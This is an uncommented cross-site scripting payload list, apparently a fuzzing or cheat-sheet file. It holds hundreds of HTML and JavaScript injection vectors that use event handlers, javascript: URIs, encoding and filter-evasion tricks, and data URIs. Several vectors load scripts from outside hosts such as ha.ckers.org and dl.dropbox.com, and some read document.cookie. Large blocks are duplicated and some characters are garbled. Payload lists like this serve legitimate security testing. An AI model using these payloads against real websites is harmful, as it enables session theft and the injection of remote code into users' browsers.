<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><
br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/
script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</
html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="javAascript:javascript:alert(1)">test1</a>
<a href="javaascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascr
ipt:alert(1)&gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=javascrip
t:alert('�
00088SS')>
<IMG
SRC=javascript:alert&
#x28'XSS')>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe %00 src="	javascript:prompt(1)	"%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/
onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j
	a
		v
			a
		&
Tab;	s
					c
						r

							i
						&
Tab;	p
									t
		&
Tab;							:a
					&Tab
;					l
									&Tab
;		e
												&Tab
;r
														t&Ne
wLine;															28&N
ewLine;															&Ta
b;1
														&Ta
b;		%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r&
Tab;t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/
javascript,ale�
00072;t(1)></script>
<div style="position:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src=&#
34http://sternefami&#
108y.net/foo.js"></sc
ript>​">Click Me</a>
‘; alert(1);
‘)alert(1);//
<ScRiPt>alert(1)</sCriPt>
<IMG SRC=jAVasCrIPt:alert(‘XSS’)>
<IMG SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(‘XSS’)>
<img src=xss onerror=alert(1)>
<iframe %00 src="	javascript:prompt(1)	"%00>
<svg><style>{font-family:'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT:confirm(1)"
<sVg><scRipt %00>alert(1) {Opera}
<img/src=`%00` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript:confirm(1)"
<img src=`%00`
 onerror=alert(1)

<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
"><h1/onmouseover='\u0061lert(1)'>%00
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-
equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/')></script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X
</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/
onerror='eval(src)'>
<img/	  src=`~` onerror=prompt(1)>
<form><iframe 	  src="javascript:alert(1)" 	;>
<a href="data:application/x-x509-user-
cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X<
/a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/
</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script ~~~>alert(0%0)</script ~~~>
<style/onload=<!--	> alert (1)>
<///style///><span %2F onmousemove='alert(1)'>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
<div/style="width:expression(confirm(1))">X</div> {IE7}
<iframe/%00/ src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/
type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\
</script //|\\
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
<div onmouseover='alert(1)'>DIV</div>
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/
helloworld_js_X.pdf">
<var onmouseover="prompt(1)">On Mouse Over</var>
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%<!--'%><script>alert(1);</script -->
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
http://www.<script>alert(1)</script .com
<iframe
src=j
	a
		v
			a
		&
Tab;	s
					c
						r

							i
						&
Tab;	p
									t
		&
Tab;							:a
					&Tab
;					l
									&Tab
;		e
												&Tab
;r
														t&Ne
wLine;															28&N
ewLine;															&Ta
b;1
														&Ta
b;		%29></iframe>
<svg><script ?>alert(1)
<iframe
src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r&
Tab;t	%28	1	%29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \
u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script
a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C
%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa
href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
<div/onmouseover='alert(1)'> style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascrip
t,alert(1)></script>
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%"
onmouseover="prompt(1)" onclick="alert(1)">x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F
%73%63%72%69%70%74%3E"></iframe>
<a
href="data:text/html;blabla,<script src=&#
34http://sternefami&#
108y.net/foo.js"></sc
ript>​">Click Me</a>
<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;ale
rt(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></
SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=”jav ascript:alert(‘XSS’);”>
<IMG SRC=”jav	ascript:alert(‘XSS’);”>
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
%253cscript%253ealert(1)%253c/script%253e
“><s”%2b”cript>alert(document.cookie)</script>
foo<script>alert(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt>
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=javascrip
t:alert('�
00088SS')>
<IMG
SRC=javascript:alert&
#x28'XSS')>
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
<BODY ONLOAD=alert(‘XSS’)>
<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>
<IMG SRC=”javascript:alert(‘XSS’)”
<iframe src=http://ha.ckers.org/scriptlet.html <
javascript:alert("hellox worldss")
<img src="javascript:alert('XSS');">
<img src=javascript:alert("XSS")>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";al
ert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/
SCRIPT>&submit.x=27&submit.y=9&cmd=search
<script>alert("hellox
worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
<script>alert("XSS");</script>&search=1
0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?
8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?
(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></
SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-
frmGoogleWeb=Web+Search
<h1><font color=blue>hellox worldss</h1>
<BODY ONLOAD=alert('hellox worldss')>
<input onfocus=write(XSS) autofocus>
<input onblur=write(XSS) autofocus><input autofocus>
<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form><button formaction="javascript:alert(XSS)">lol
<!--<img src="--><img src=x onerror=alert(XSS)//">
<![><img src="]><img src=x onerror=alert(XSS)//">
<style><img src="</style><img src=x onerror=alert(XSS)//">
<? foo="><script>alert(1)</script>">
<! foo="><script>alert(1)</script>">
</ foo="><script>alert(1)</script>">
<? foo="><x foo='?><script>alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
<% foo><x foo="%><script>alert(123)</script>">
<div style="font-family:'foo ;color:red;';">LOL
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/
color:green;color:bl/*IE*/ue;}</style>
<script>({0:#0=alert/#0#/#0#(0)})</script>
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
<SCRIPT>alert(/XSS/.source)</SCRIPT>
\\";alert('XSS');//
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
<BODY BACKGROUND=\"javascript:alert('XSS')\">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC=\"javascript:alert('XSS')\">
<IMG LOWSRC=\"javascript:alert('XSS')\">
<BGSOUND SRC=\"javascript:alert('XSS');\">
<BR SIZE=\"&{alert('XSS')}\">
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></
LAYER>
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV=\"Link\"
Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/
xssmoz.xml#xss\")}</STYLE>
<XSS STYLE=\"behavior: url(xss.htc);\">
<STYLE>li {list-style-image:
url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox(\"XSS\")'>
<IMG SRC=\"mocha:[code]\">
<IMG SRC=\"livescript:[code]\">
žscriptualert(EXSSE)ž/scriptu
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
<META HTTP-EQUIV=\"refresh\"
CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"&
gt;
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;
URL=http://;URL=javascript:alert('XSS');\"
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
